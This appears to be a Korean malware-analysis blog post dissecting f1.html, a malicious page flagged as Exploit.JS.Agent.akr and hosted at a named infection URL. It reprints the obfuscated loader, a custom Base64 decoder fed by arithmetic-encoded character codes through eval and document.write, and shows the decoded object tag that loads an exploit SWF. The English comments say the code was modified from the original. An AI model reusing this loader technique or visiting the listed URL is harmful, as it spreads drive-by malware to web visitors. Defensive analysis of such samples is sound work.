

Decode Base 64 를 이용한 악성 스크립트!

File :

f1.html
MD5 :  bce75d05869be9fdf489d13630bab1f1
크기 : 8.67KB (8,879 바이트)
감염 사이트 : http://toto888.gnway.net:8080/xxx/f1.html
Kaspersky : Exploit.JS.Agent.akr
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=f811ce7544059f8123fdf5199e2abb29e8f4508dc9b58a761185779d96de2c12-1319253379
 
원본 코드

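var a1 = "ABCDEFG";
var a2 = "HIJKLMNOP";
var a3 = "QRSTUVWXYZabcdef";
// Standard Base64 alphabet assembled from fragments; index 64 is the '=' pad.
// The a1/a2/a3 split has no functional purpose — presumably it keeps the full
// alphabet string out of simple signature scans (assumption, not provable here).
var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";

/**
 * Hand-rolled Base64 decoder used by the sample as its unpacking stage.
 *
 * Characters outside the Base64 alphabet are stripped first, then the input is
 * consumed four sextets at a time. Each decoded byte is appended with
 * String.fromCharCode, so the result is a "binary string" (one char per byte).
 *
 * Fixes relative to the original: empty input returns "" instead of three NUL
 * characters, and a trailing group shorter than four characters is treated as
 * padded instead of being read past the end of the string (the original's
 * indexOf("") returned 0 and produced bogus NUL bytes). The unused
 * `base64test` regex is dropped.
 *
 * @param {string} input - Base64 text; whitespace and other foreign characters are ignored.
 * @returns {string} decoded bytes as a binary string.
 */
function mydata(input){
  var cleaned = String(input).replace(/[^A-Za-z0-9\+\/\=]/g, "");
  var output = "";

  // Sextet value at pos; anything past the end counts as '=' (index 64).
  function sextet(pos) {
    if (pos >= cleaned.length) { return 64; }
    return keyStrs.indexOf(cleaned.charAt(pos));
  }

  for (var i = 0; i < cleaned.length; i += 4) {
    var enc1 = sextet(i);
    var enc2 = sextet(i + 1);
    var enc3 = sextet(i + 2);
    var enc4 = sextet(i + 3);
    // A lone trailing character (or pad in the first two slots) cannot form a
    // byte, so stop rather than emit garbage.
    if (enc1 === 64 || enc2 === 64) { break; }
    output += String.fromCharCode((enc1 << 2) | (enc2 >> 4));
    // Pad in slot 3/4 means this group carried only one/two bytes.
    if (enc3 !== 64) { output += String.fromCharCode(((enc2 & 15) << 4) | (enc3 >> 2)); }
    if (enc4 !== 64) { output += String.fromCharCode(((enc3 & 3) << 6) | enc4); }
  }
  return output;
}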
// KT is a comma-separated list of small arithmetic expressions, one per
// character code of the Base64 text. The first four evaluate to 80, 71, 57, 105
// ("P","G","9","i"), which is the start of the Base64 string shown in the alert
// below. Storing codes as arithmetic rather than literal numbers or text is a
// common way to defeat string-based static signatures (hedged inference; the
// page shows only the listing, not the author's intent).
// NOTE: the listing below is abridged by the blog author ("[중간코드 생략]" =
// "middle code omitted"), so this line is not runnable as shown.
KT="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";
// eval() turns the expression list into the Base64 text (via
// String.fromCharCode) and decodes it with mydata(). The eval is the natural
// hook for analysis: replacing mydata with alert, as the author does below,
// reveals the Base64 stage without running the decoded markup.
t=eval("mydata(String.fromCharCode("+KT+"))");
// document.write injects the decoded HTML (the <object> element shown at the
// bottom of the page) into the current document, which is what actually loads
// the embedded Flash content.
document.write(t);

Eval 함수 실행 후

mydata(String.fromCharCode(="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";)


mydata ~> Alert 변경후 실행 !

---------------------------
Microsoft Internet Explorer
---------------------------
PG9iamVjdCBjbGFzc2lkPSJjbHNpZDpkMjdjZGI2ZS1hZTZkLTExY2YtOTZiO
C00NDQ1NTM1NDAwMDAiIA0Kd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMDAiIGlkP
SJ0ZXN0IiBhbGlnbj0ibWlkZGxlIj4NCjxwYXJhbSBuYW1lPSJtb3ZpZSIgdmFs
[중간코드 생략]bHVlPSJ0cnVlIiAvPg0KPHBhcmFtIG5hbWU9ImRldmljZWZvbnQiIHZhbHVlPSJ
mYWxzZSIgLz4NCjxwYXJhbSBuYW1lPSJzYWxpZ24iIHZhbHVlPSIiIC8+DQo8
cGFyYW0gbmFtZT0iYWxsb3dTY3JpcHRBY2Nlc3MiIHZhbHVlPSJzYW1lRG9tY
WluIiAvPg0KPC9vYmplY3Q+
---------------------------
확인  
---------------------------


Decode Base 64

<!-- Decoded payload written into the page by document.write(t). The classid
     is that of the Shockwave Flash ActiveX control; it loads happ.swf with an
     `info` query parameter whose meaning is not shown on this page. The SWF
     itself (the likely exploit stage, per the Kaspersky name above) is not
     included here, so no claim is made about its contents. -->
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
width="200" height="100" id="test" align="middle">
<param name="movie" value="happ.swf?
info=02E631B5B1353336AB51D3527B7A6FAE7986" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<!-- allowScriptAccess=sameDomain: the SWF may call into the page's JavaScript
     when served from the same origin as this HTML. -->
<param name="allowScriptAccess" value="sameDomain" />
</object>